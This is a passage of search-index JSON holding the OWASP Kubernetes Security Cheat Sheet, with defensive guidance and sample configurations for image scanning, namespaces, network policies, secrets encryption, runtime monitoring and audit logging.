"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-dashboard","title":"Securing Kubernetes Dashboard","text":"

The Kubernetes dashboard is a webapp for managing your cluster. It is not a part of the Kubernetes cluster itself; it has to be installed by the owners of the cluster. Thus, there are a lot of tutorials on how to do this. Unfortunately, most of them create a service account with very high privileges. This caused Tesla and some others to be hacked via such a poorly configured Kubernetes dashboard. (Reference: Tesla cloud resources are hacked to run cryptocurrency-mining malware - https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/)

To prevent attacks via the dashboard, you should follow some tips:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-build-phase","title":"Kubernetes Security Best Practices: Build Phase","text":"

Securing containers and Kubernetes starts in the build phase with securing your container images. The two main things to do here are to build secure images and to scan those images for any known vulnerabilities.

A container image is an immutable, lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings [https://www.docker.com/resources/what-container]. The image shares the kernel of the operating system present on its host machine.

Container images must be built using approved and secure base images that are scanned and monitored at regular intervals, to ensure that only secure and authentic images are used within the cluster. It is recommended to configure strong governance policies regarding how images are built and stored in trusted image registries.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#ensure-that-only-authorized-images-are-used-in-your-environment","title":"Ensure That Only Authorized Images are used in Your Environment","text":"

Without a process that ensures that only images adhering to the organization's policy are allowed to run, the organization is open to the risk of running vulnerable or even malicious containers. Downloading and running images from unknown sources is dangerous; it is equivalent to running software from an unknown vendor on a production server. Don't do that.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-registry-and-the-use-of-an-image-scanner-to-identify-known-vulnerabilities","title":"Container registry and the use of an image scanner to identify known vulnerabilities","text":"

A container registry is the central repository of container images. Based on your needs, you can utilize public repositories or have a private repository as the container registry. Use private registries to store your approved images, and make sure you only push approved images to them. This alone reduces the number of potential images that enter your pipeline to a fraction of the hundreds of thousands of publicly available images.

Build a CI pipeline that integrates security assessment (like vulnerability scanning), making it part of the build process. The CI pipeline should ensure that only vetted code (approved for production) is used for building the images. Once an image is built, it should be scanned for security vulnerabilities; only if no issues are found should the image be pushed to a private registry, from which deployment to production is done. A failure in the security assessment should fail the pipeline, preventing images with poor security quality from being pushed to the image registry.

Many source code repositories provide scanning capabilities (e.g. GitHub, GitLab), and many CI tools offer integration with open source vulnerability scanners such as Trivy or Grype.
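
For example, a pipeline step using Trivy (one of the scanners mentioned above) can fail the build when high or critical findings are present; the image name is a placeholder:

trivy image --exit-code 1 --severity HIGH,CRITICAL registry.example.com/myapp:1.0.0\n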

There is work in progress being done in Kubernetes for image authorization plugins, which will allow preventing the shipping of unauthorized images. For more information, refer to the PR https://github.com/kubernetes/kubernetes/pull/27129.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-minimal-base-images-and-avoid-adding-unnecessary-components","title":"Use minimal base images and avoid adding unnecessary components","text":"

Avoid using images with OS package managers or shells because they could contain unknown vulnerabilities. If you must include OS packages, remove the package manager at a later step. Consider using minimal images, such as distroless images.

Restricting what's in your runtime container to precisely what's necessary for your app is a best practice employed by Google and other tech giants that have used containers in production for many years. It improves the signal to noise of scanners (e.g. CVE) and reduces the burden of establishing provenance to just what you need.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#distroless-images","title":"Distroless images","text":"

Distroless images contain far fewer packages than other images and do not include a shell, which reduces the attack surface.

For more information on distroless images, refer to https://github.com/GoogleContainerTools/distroless.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#scratch-image","title":"Scratch image","text":"

An empty image, ideal for statically compiled languages like Go. Because the image is empty, the attack surface is truly minimal - only your code!

For more information, refer to https://hub.docker.com/_/scratch

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-the-latest-imagesensure-images-are-up-to-date","title":"Use the latest images/ensure images are up to date","text":"

Ensure your images (and any third-party tools you include) are up to date and utilizing the latest versions of their components.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-deploy-phase","title":"Kubernetes Security Best Practices: Deploy Phase","text":"

Kubernetes infrastructure should be configured securely prior to workloads being deployed. From a security perspective, you first need visibility into what you\u2019re deploying \u2013 and how. Then you can identify and respond to security policy violations. At a minimum, you need to know:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-namespaces-to-properly-isolate-your-kubernetes-resources","title":"Use Kubernetes namespaces to properly isolate your Kubernetes resources","text":"

Namespaces give you the ability to create logical partitions and enforce separation of your resources as well as limit the scope of user permissions.
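
For example, separate namespaces can be created per team or per environment (the names are illustrative):

kubectl create namespace team-a\nkubectl create namespace team-b\n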

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-for-a-request","title":"Setting the namespace for a request","text":"

To set the namespace for a current request, use the --namespace flag. Refer to the following examples:

kubectl run nginx --image=nginx --namespace=<insert-namespace-name-here>\nkubectl get pods --namespace=<insert-namespace-name-here>\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#setting-the-namespace-preference","title":"Setting the namespace preference","text":"

You can permanently save the namespace for all subsequent kubectl commands in that context.

kubectl config set-context --current --namespace=<insert-namespace-name-here>\n

Validate it with the following command.

kubectl config view --minify | grep namespace:\n

Learn more about namespaces at https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#create-policies-to-govern-image-provenance-using-the-imagepolicywebhook","title":"Create policies to govern image provenance using the ImagePolicyWebhook","text":"

Prevent unapproved images from being used: configure the ImagePolicyWebhook admission controller to reject pods that use unapproved images, including:
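
A rough sketch of the admission configuration that enables the plugin, passed to the API server via the --admission-control-config-file flag (the kubeconfig path and TTL values are illustrative):

apiVersion: apiserver.config.k8s.io/v1\nkind: AdmissionConfiguration\nplugins:\n- name: ImagePolicyWebhook\n  configuration:\n    imagePolicy:\n      kubeConfigFile: /etc/kubernetes/image-policy/kubeconfig.yaml\n      allowTTL: 50\n      denyTTL: 50\n      retryBackoff: 500\n      defaultAllow: false\n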

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-continuous-security-vulnerability-scanning","title":"Implement Continuous Security Vulnerability Scanning","text":"

New vulnerabilities are published every day, and containers might include outdated packages with recently-disclosed vulnerabilities (CVEs). A strong security posture will include regular production scanning, covering first-party containers (applications you have built and previously scanned) and third-party containers (sourced from trusted repositories and vendors).

Open Source projects such as ThreatMapper can assist in identifying and prioritizing vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#regularly-apply-security-updates-to-your-environment","title":"Regularly Apply Security Updates to Your Environment","text":"

In case vulnerabilities are found in running containers, it is recommended to always update the source image and redeploy the containers.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#note","title":"NOTE","text":"

Try to avoid direct updates to the running containers as this can break the image-container relationship.

Example: apt-get update  \n

Upgrading containers is extremely easy with the Kubernetes rolling updates feature - this allows gradually updating a running application by upgrading its images to the latest version.
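
For example (the deployment, container, and image names are placeholders):

kubectl set image deployment/<deployment-name> <container-name>=<image>:<new-tag>\nkubectl rollout status deployment/<deployment-name>\n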

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#assess-the-privileges-used-by-containers","title":"Assess the privileges used by containers","text":"

The set of capabilities, role bindings, and privileges given to containers can greatly impact your security risk. The goal here is to adhere to the principle of least privilege and provide the minimum privileges and capabilities that would allow the container to perform its intended function.

Pod Security Policies are one way to control the security-related attributes of pods, including container privilege levels. These can allow an operator to specify the following:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#apply-security-context-to-your-pods-and-containers","title":"Apply Security Context to Your Pods and Containers","text":"

A security context is a property defined in the deployment yaml. It controls the security parameters that will be assigned to the pod/container/volume. These controls can eliminate entire classes of attacks that depend on privileged access. Read-only root file systems, for example, can prevent any attack that depends on installing software or writing to the file system.

When designing your containers and pods, make sure that you configure the security context for your pods, containers and volumes to grant only the privileges needed for the resource to function. Some of the important parameters are as follows:

Security Context Setting | Description
--- | ---
SecurityContext->runAsNonRoot | Indicates that containers should run as a non-root user
SecurityContext->Capabilities | Controls the Linux capabilities assigned to the container
SecurityContext->readOnlyRootFilesystem | Controls whether a container will be able to write into the root filesystem
PodSecurityContext->runAsNonRoot | Prevents running a container with the 'root' user as part of the pod

Here is an example for pod definition with security context parameters:

apiVersion: v1\nkind: Pod\nmetadata:\n  name: hello-world\nspec:\n  containers:\n  # specification of the pod's containers\n  # ...\n  # ...\n  # Security Context\n  securityContext:\n    readOnlyRootFilesystem: true\n    runAsNonRoot: true\n

For more information on security context for Pods, refer to the documentation at https://kubernetes.io/docs/tasks/configure-pod-container/security-context

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implement-service-mesh","title":"Implement Service Mesh","text":"

A service mesh is an infrastructure layer for microservices applications that can help reduce the complexity of managing microservices and deployments by handling infrastructure service communication quickly, securely and reliably. Service meshes are great at solving operational challenges and issues when running containers and microservices because they provide a uniform way to secure, connect and monitor microservices. Service mesh provides the following advantages:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#observability","title":"Observability","text":"

Service Mesh provides tracing and telemetry metrics that make it easy to understand your system and quickly identify the root cause of any problems.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#security","title":"Security","text":"

A service mesh provides security features aimed at securing the services inside your network and quickly identifying any compromising traffic entering your cluster. A service mesh can help you more easily manage security through mTLS, ingress and egress control, and more.

Securing microservices is hard. There are a multitude of tools that address microservices security, but service mesh is the most elegant solution for addressing encryption of on-the-wire traffic within the network.

Service mesh provides defense with mutual TLS (mTLS) encryption of the traffic between your services. The mesh can automatically encrypt and decrypt requests and responses, removing that burden from the application developer. It can also improve performance by prioritizing the reuse of existing, persistent connections, reducing the need for the computationally expensive creation of new ones. With service mesh, you can secure traffic over the wire and also make strong identity-based authentication and authorizations for each microservice.
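
As a sketch, assuming Istio as the service mesh, mesh-wide mutual TLS can be enforced with a PeerAuthentication resource such as:

apiVersion: security.istio.io/v1beta1\nkind: PeerAuthentication\nmetadata:\n  name: default\n  namespace: istio-system\nspec:\n  mtls:\n    mode: STRICT\n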

We see a lot of value in this for enterprise companies. With a good service mesh, you can see whether mTLS is enabled and working between each of your services and get immediate alerts if security status changes.

Service mesh adds a layer of security that allows you to monitor and address compromising traffic as it enters the mesh. Istio integrates with Kubernetes as an ingress controller and takes care of load balancing for ingress. This allows you to add a level of security at the perimeter with ingress rules. Egress control allows you to see and manage external services and control how your services interact with them.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#operational-control","title":"Operational Control","text":"

A service mesh allows security and platform teams to set the right macro controls to enforce access controls, while allowing developers to make customizations they need to move quickly within these guardrails.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rbac","title":"RBAC","text":"

A strong Role-Based Access Control (RBAC) system is arguably one of the most critical requirements in large engineering organizations, since even the most secure system can be easily circumvented by overprivileged users or employees. Restricting privileged users to the least privileges necessary to perform their job responsibilities, ensuring that access to systems is set to "deny all" by default, and ensuring that proper documentation detailing roles and responsibilities is in place are among the most critical security concerns in the enterprise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

Along with its many advantages, a service mesh also brings its own set of challenges, a few of which are listed below:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#implementing-centralized-policy-management","title":"Implementing centralized policy management","text":"

There are numerous projects which are able to provide centralized policy management for a Kubernetes cluster, most prominently the Open Policy Agent (OPA) project, Kyverno, and Validating Admission Policy (a built-in feature, still alpha and therefore off by default as of 1.26). In order to provide some depth, we will focus on OPA for the remainder of this cheat sheet.

OPA is a project that started in 2016 with the aim of unifying policy enforcement across different technologies and systems. It can be used to enforce policies on platforms like Kubernetes clusters. Within Kubernetes, RBAC and Pod Security Policies can be used to impose fine-grained control over the cluster, but they only apply inside the cluster, not outside it. That's where Open Policy Agent (OPA) comes into play. OPA was introduced to create a unified method of enforcing security policy across the stack.

OPA is a general-purpose, domain-agnostic policy enforcement tool. It can be integrated with APIs, the Linux SSH daemon, an object store like Ceph, etc. OPA designers purposefully avoided basing it on any other project. Accordingly, the policy query and decision do not follow a specific format. That is, you can use any valid JSON data as request attributes as long as it provides the required data. Similarly, the policy decision coming from OPA can also be any valid JSON data. You choose what gets input and what gets output. For example, you can opt to have OPA return a True or False JSON object, a number, a string, or even a complex data object. Currently, OPA is part of the CNCF as an incubating project.

Most common use cases of OPA:

OPA enables you to accelerate time to market by providing pre-cooked authorization technology so you don\u2019t have to develop it from scratch. It uses a declarative policy language purpose built for writing and enforcing rules such as, \u201cAlice can write to this repository,\u201d or \u201cBob can update this account.\u201d It comes with a rich suite of tooling to help developers integrate those policies into their applications and even allow the application\u2019s end users to contribute policy for their tenants as well.

If you have homegrown application authorization solutions in place, you may not want to rip them out to swap in OPA. At least not yet. But if you are going to be decomposing those monolithic apps and moving to microservices to scale and improve developer efficiency, you\u2019re going to need a distributed authorization system and OPA (or one of the related competitors) could be the answer.

Kubernetes has given developers tremendous control over the traditional silos of compute, networking and storage. Developers today can set up the network the way they want and set up storage the way they want. Administrators and security teams responsible for the well-being of a given container cluster need to make sure developers don\u2019t shoot themselves (or their neighbors) in the foot.

OPA can be used to build policies that require, for example, all container images to be from trusted sources, that prevent developers from running software as root, that make sure storage is always marked with the encrypt bit, that ensure storage does not get deleted just because a pod gets restarted, that limit internet access, etc.
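
For example, assuming OPA Gatekeeper with the community K8sAllowedRepos constraint template installed, a constraint restricting pods to a trusted registry (the registry prefix is illustrative) might look like:

apiVersion: constraints.gatekeeper.sh/v1beta1\nkind: K8sAllowedRepos\nmetadata:\n  name: allowed-repos\nspec:\n  match:\n    kinds:\n    - apiGroups: [\"\"]\n      kinds: [\"Pod\"]\n  parameters:\n    repos:\n    - \"registry.example.com/\"\n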

OPA integrates directly into the Kubernetes API server, so it has complete authority to reject any resource\u2014whether compute, networking, storage, etc.\u2014that policy says doesn\u2019t belong in a cluster. Moreover, you can expose those policies earlier in the development lifecycle (e.g. the CICD pipeline or even on developer laptops) so that developers can receive feedback as early as possible. You can even run policies out-of-band to monitor results so that administrators can ensure policy changes don\u2019t inadvertently do more damage than good.

And finally, many organizations are using OPA to regulate use of service mesh architectures. So, even if you're not embedding OPA to implement application authorization logic (the top use case discussed above), you probably still want control over the APIs microservices can execute, and you can achieve that by putting authorization policies into the service mesh. Or, you may be motivated by security, and implement policies in the service mesh to limit lateral movement within a microservice architecture. Another common practice is to build policies into the service mesh to ensure your compliance regulations are satisfied even when modification to source code is involved.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limiting-resource-usage-on-a-cluster","title":"Limiting resource usage on a cluster","text":"

Resource quota limits the number or capacity of resources granted to a namespace. This is most often used to limit the amount of CPU, memory, or persistent disk a namespace can allocate, but can also control how many pods, services, or volumes exist in each namespace.

Limit ranges restrict the maximum or minimum size of some of the resources above, to prevent users from requesting unreasonably high or low values for commonly reserved resources like memory, or to provide default limits when none are specified.

Running resource-unbound containers puts your system at risk of DoS or "noisy neighbor" scenarios. To prevent and minimize those risks, you should define resource quotas. By default, all resources in a Kubernetes cluster are created with unbounded CPU and memory requests/limits. You can create resource quota policies, attached to a Kubernetes namespace, in order to limit the CPU and memory a pod is allowed to consume.

The following is an example of a namespace resource quota definition that limits the number of pods in the namespace to 4, total CPU requests to 1 and CPU limits to 2, and total memory requests to 1Gi and memory limits to 2Gi.

compute-resources.yaml:

apiVersion: v1\nkind: ResourceQuota\nmetadata:\n  name: compute-resources\nspec:\n  hard:\n    pods: \"4\"\n    requests.cpu: \"1\"\n    requests.memory: 1Gi\n    limits.cpu: \"2\"\n    limits.memory: 2Gi\n

Assign a resource quota to namespace:

kubectl create -f ./compute-resources.yaml --namespace=myspace\n

For more information on configuring resource quotas, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/policy/resource-quotas/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-kubernetes-network-policies-to-control-traffic-between-pods-and-clusters","title":"Use Kubernetes network policies to control traffic between pods and clusters","text":"

Running different applications on the same Kubernetes cluster creates a risk of one compromised application attacking a neighboring application. Network segmentation is important to ensure that containers can communicate only with those they are supposed to.

By default, Kubernetes allows every pod to contact every other pod. Traffic to a pod from an external network endpoint outside the cluster is allowed if ingress from that endpoint is allowed to the pod. Traffic from a pod to an external network endpoint outside the cluster is allowed if egress is allowed from the pod to that endpoint.

Network segmentation policies are a key security control that can prevent lateral movement across containers in the case that an attacker breaks in. One of the challenges in Kubernetes deployments is creating network segmentation between pods, services and containers. This is a challenge due to the \u201cdynamic\u201d nature of container network identities (IPs), along with the fact that containers can communicate both inside the same node or between nodes.

Users of Google Cloud Platform can benefit from automatic firewall rules, preventing cross-cluster communication. A similar implementation can be deployed on-premises using network firewalls or SDN solutions. There is work being done in this area by the Kubernetes Network SIG, which will greatly improve the pod-to-pod communication policies. A new network policy API should address the need to create firewall rules around pods, limiting the network access that a containerized application can have.

The following is an example of a network policy that controls the network for \u201cbackend\u201d pods, only allowing inbound network access from \u201cfrontend\u201d pods:

apiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: pol1\n  namespace: tenant-a\nspec:\n  podSelector:\n    matchLabels:\n      segment: backend\n  policyTypes:\n  - Ingress\n  ingress:\n  - from:\n    - podSelector:\n        matchLabels:\n          segment: frontend\n    ports:\n    - protocol: TCP\n      port: 80\n

For more information on configuring network policies, refer to the Kubernetes documentation at https://kubernetes.io/docs/concepts/services-networking/network-policies.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data","title":"Securing data","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#keep-secrets-as-secrets","title":"Keep secrets as secrets","text":"

In Kubernetes, a Secret is a small object that contains sensitive data, like a password or token. It is important to understand how sensitive data such as credentials and keys are stored and accessed. Even though a pod is not able to access the secrets of another pod, it is crucial to keep the secret separate from an image or pod. Otherwise, anyone with access to the image would have access to the secret as well. Complex applications that handle multiple processes and have public access are especially vulnerable in this regard. It is best for secrets to be mounted into read-only volumes in your containers, rather than exposing them as environment variables.
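
A minimal sketch of mounting a Secret into a read-only volume (the pod, secret, image, and path names are illustrative):

apiVersion: v1\nkind: Pod\nmetadata:\n  name: app\nspec:\n  containers:\n  - name: app\n    image: registry.example.com/app:1.0.0\n    volumeMounts:\n    - name: app-credentials\n      mountPath: /etc/app/credentials\n      readOnly: true\n  volumes:\n  - name: app-credentials\n    secret:\n      secretName: app-credentials\n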

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#encrypt-secrets-at-rest","title":"Encrypt secrets at rest","text":"

The etcd database in general contains any information accessible via the Kubernetes API and may grant an attacker significant visibility into the state of your cluster.

Always encrypt your backups using a well reviewed backup and encryption solution, and consider using full disk encryption where possible.

Kubernetes supports encryption at rest, a feature introduced in 1.7, and v1 beta since 1.13. This will encrypt Secret resources in etcd, preventing parties that gain access to your etcd backups from viewing the content of those secrets. While this feature is currently beta, it offers an additional level of defense when backups are not encrypted or an attacker gains read access to etcd.
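
A minimal sketch of an encryption configuration, passed to kube-apiserver via the --encryption-provider-config flag (the key material is a placeholder):

apiVersion: apiserver.config.k8s.io/v1\nkind: EncryptionConfiguration\nresources:\n- resources:\n  - secrets\n  providers:\n  - aescbc:\n      keys:\n      - name: key1\n        secret: <base64-encoded-32-byte-key>\n  - identity: {}\n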

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#alternatives-to-kubernetes-secret-resources","title":"Alternatives to Kubernetes Secret resources","text":"

You may want to consider using an external secrets manager to store and manage your secrets rather than storing them in Kubernetes Secrets. This provides a number of benefits over using Kubernetes Secrets, including the ability to manage secrets across multiple clusters (or clouds), and the ability to manage and rotate secrets centrally.

For more information on Secrets and their alternatives, refer to the documentation at https://kubernetes.io/docs/concepts/configuration/secret/.

Also see the Secrets Management cheat sheet for more details and best practices on managing secrets.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#finding-exposed-secrets","title":"Finding exposed secrets","text":"

Open-source tools such as SecretScanner and ThreatMapper can scan container filesystems for sensitive resources, such as API tokens, passwords, and keys. Such resources would be accessible to any user who had access to the unencrypted container filesystem, whether during build, at rest in a registry or backup, or running.

Review the secret material present on the container against the principle of least privilege, and assess the risk posed by a compromise.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-security-best-practices-runtime-phase","title":"Kubernetes Security Best Practices: Runtime Phase","text":"

The runtime phase exposes containerized applications to a slew of new security challenges. Your goal here is to both gain visibility into your running environment and detect and respond to threats as they arise.

Proactively securing your containers and Kubernetes deployments at the build and deploy phases can greatly reduce the likelihood of security incidents at runtime and the subsequent effort needed to respond to them.

First, you must monitor the most security-relevant container activities, including:

Observing container behavior to detect anomalies is generally easier in containers than in virtual machines because of the declarative nature of containers and Kubernetes. These attributes allow easier introspection into what you have deployed and its expected activity.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-pod-security-policies-to-prevent-risky-containerspods-from-being-used","title":"Use Pod Security Policies to prevent risky containers/Pods from being used","text":"

PodSecurityPolicy is a cluster-level resource available in Kubernetes (via kubectl) that is highly recommended. You must enable the PodSecurityPolicy admission controller to use it. Given the nature of admission controllers, you must authorize at least one policy; otherwise no pods will be allowed to be created in the cluster.

Pod Security Policies address several critical security use cases, including:

For more information on Pod security policies, refer to the documentation at https://kubernetes.io/docs/concepts/policy/pod-security-policy/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-runtime-security","title":"Container Runtime Security","text":"

Hardening containers at runtime gives security teams the ability to detect and respond to threats and anomalies while the containers or workloads are in a running state. This is typically carried out by intercepting the low-level system calls and looking for events that may indicate compromise. Some examples of events that should trigger an alert would include:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-sandboxing","title":"Container Sandboxing","text":"

Container runtimes are typically permitted to make direct calls to the host kernel, which then interacts with hardware and devices to respond to the request. Cgroups and namespaces exist to give containers a certain amount of isolation, but the kernel still presents a large attack surface. In multi-tenant and highly untrusted clusters, an additional layer of sandboxing is often required to protect against container breakout and kernel exploits. Below we will explore a few OSS technologies that help further isolate running containers from the host kernel:
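
One such technology is gVisor; a rough sketch of exposing it through a RuntimeClass, assuming its runsc handler has been installed and configured on the nodes (pod and image names are illustrative):

apiVersion: node.k8s.io/v1\nkind: RuntimeClass\nmetadata:\n  name: gvisor\nhandler: runsc\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: sandboxed-app\nspec:\n  runtimeClassName: gvisor\n  containers:\n  - name: app\n    image: registry.example.com/app:1.0.0\n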

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#preventing-containers-from-loading-unwanted-kernel-modules","title":"Preventing containers from loading unwanted kernel modules","text":"

The Linux kernel automatically loads kernel modules from disk if needed in certain circumstances, such as when a piece of hardware is attached or a filesystem is mounted. Of particular relevance to Kubernetes, even unprivileged processes can cause certain network-protocol-related kernel modules to be loaded, just by creating a socket of the appropriate type. This may allow an attacker to exploit a security hole in a kernel module that the administrator assumed was not in use.

To prevent specific modules from being automatically loaded, you can uninstall them from the node, or add rules to block them. On most Linux distributions, you can do that by creating a file such as /etc/modprobe.d/kubernetes-blacklist.conf with contents like:

# DCCP is unlikely to be needed, has had multiple serious\n# vulnerabilities, and is not well-maintained.\nblacklist dccp\n\n# SCTP is not used in most Kubernetes clusters, and has also had\n# vulnerabilities in the past.\nblacklist sctp\n

To block module loading more generically, you can use a Linux Security Module (such as SELinux) to completely deny the module_request permission to containers, preventing the kernel from loading modules for containers under any circumstances. (Pods would still be able to use modules that had been loaded manually, or modules that were loaded by the kernel on behalf of some more-privileged process.)

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#compare-and-analyze-different-runtime-activity-in-pods-of-the-same-deployments","title":"Compare and analyze different runtime activity in pods of the same deployments","text":"

Containerized applications are replicated for high availability, fault tolerance, or scale reasons. Replicas should behave nearly identically; replicas with significant deviations from the others warrant further investigation. Integrate your Kubernetes security tool with other external systems (email, PagerDuty, Slack, Google Cloud Security Command Center, SIEMs [security information and event management], etc.) and leverage deployment labels or annotations to alert the team responsible for a given application when a potential threat is detected. Commercial Kubernetes security vendors should support a wide array of integrations with external tools.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#monitor-network-traffic-to-limit-unnecessary-or-insecure-communication","title":"Monitor network traffic to limit unnecessary or insecure communication","text":"

Observe your active network traffic and compare that traffic to what is allowed based on your Kubernetes network policies. Containerized applications typically make extensive use of cluster networking, and observing active networking traffic is a good way to understand how applications interact with each other and identify unexpected communication.

At the same time, comparing the active traffic with what\u2019s allowed gives you valuable information about what isn\u2019t happening but is allowed. With that information, you can further tighten your allowed network policies so that it removes superfluous connections and decreases your attack surface.

Open source projects like https://github.com/kinvolk/inspektor-gadget or https://github.com/deepfence/PacketStreamer may help with this, and commercial security solutions provide varying degrees of container network traffic analysis.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#if-breached-scale-suspicious-pods-to-zero","title":"If breached, scale suspicious pods to zero","text":"

Use Kubernetes native controls to contain a successful breach by automatically instructing Kubernetes to scale suspicious pods to zero, or to kill and then restart instances of breached applications.
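
For example (the deployment name is a placeholder):

kubectl scale deployment <deployment-name> --replicas=0\n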

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#rotate-infrastructure-credentials-frequently","title":"Rotate infrastructure credentials frequently","text":"

The shorter the lifetime of a secret or credential the harder it is for an attacker to make use of that credential. Set short lifetimes on certificates and automate their rotation. Use an authentication provider that can control how long issued tokens are available and use short lifetimes where possible. If you use service account tokens in external integrations, plan to rotate those tokens frequently. For example, once the bootstrap phase is complete, a bootstrap token used for setting up nodes should be revoked or its authorization removed.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#receiving-alerts-for-security-updates-and-reporting-vulnerabilities","title":"Receiving alerts for security updates and reporting vulnerabilities","text":"

Join the kubernetes-announce group (https://kubernetes.io/docs/reference/issues-security/security/) for emails about security announcements. See the security reporting page (https://kubernetes.io/docs/reference/issues-security/security) for more on how to report vulnerabilities.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Kubernetes supplies cluster-based logging, allowing container activity to be logged into a central log hub. When a cluster is created, the standard output and standard error of each container can be ingested using a Fluentd agent running on each node into either Google Stackdriver Logging or Elasticsearch, and viewed with Kibana.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#enable-audit-logging","title":"Enable audit logging","text":"

The audit logger is a beta feature that records actions taken by the API server for later analysis in the event of a compromise. It is recommended to enable audit logging and archive the audit file on a secure server.

Ensure logs are monitored for anomalous or unwanted API calls, especially any authorization failures (these log entries will have a status message "Forbidden"). Authorization failures could mean that an attacker is trying to abuse stolen credentials.

Managed Kubernetes providers, including GKE, provide access to this data in their cloud console and may allow you to set up alerts on authorization failures.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":"

Audit logs can be useful for compliance as they should help you answer the questions of what happened, who did what and when. Kubernetes provides flexible auditing of kube-apiserver requests based on policies. These help you track all activities in chronological order.

Here is an example of an audit log:

{\n\"kind\":\"Event\",\n\"apiVersion\":\"audit.k8s.io/v1beta1\",\n\"metadata\":{ \"creationTimestamp\":\"2019-08-22T12:00:00Z\" },\n\"level\":\"Metadata\",\n\"timestamp\":\"2019-08-22T12:00:00Z\",\n\"auditID\":\"23bc44ds-2452-242g-fsf2-4242fe3ggfes\",\n\"stage\":\"RequestReceived\",\n\"requestURI\":\"/api/v1/namespaces/default/persistentvolumeclaims\",\n\"verb\":\"list\",\n\"user\": {\n\"username\":\"user@example.org\",\n\"groups\":[ \"system:authenticated\" ]\n},\n\"sourceIPs\":[ \"172.12.56.1\" ],\n\"objectRef\": {\n\"resource\":\"persistentvolumeclaims\",\n\"namespace\":\"default\",\n\"apiVersion\":\"v1\"\n},\n\"requestReceivedTimestamp\":\"2019-08-22T12:00:00Z\",\n\"stageTimestamp\":\"2019-08-22T12:00:00Z\"\n}\n
"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#define-audit-policies","title":"Define Audit Policies","text":"

Audit policy defines rules about what events should be recorded and what data they should include. The audit policy object structure is defined in the audit.k8s.io API group. When an event is processed, it's compared against the list of rules in order. The first matching rule sets the \"audit level\" of the event.

The known audit levels are as follows:

You can pass a file with the policy to kube-apiserver using the --audit-policy-file flag. If the flag is omitted, no events are logged. Note that the rules field must be provided in the audit policy file. A policy with no (0) rules is treated as illegal.
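
A minimal sketch of such a policy file, recording request metadata (user, verb, resource, timestamp) for every request:

apiVersion: audit.k8s.io/v1\nkind: Policy\nrules:\n# At minimum, record metadata for all requests\n- level: Metadata\n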

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#understanding-logging","title":"Understanding Logging","text":"

One main challenge with logging in Kubernetes is understanding what logs are generated and how to use them. Let's start by examining the Kubernetes logging architecture from a bird's-eye view.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#container-logging","title":"Container logging","text":"

The first layer of logs that can be collected from a Kubernetes cluster are those being generated by your containerized applications.

An example pod manifest is as follows:

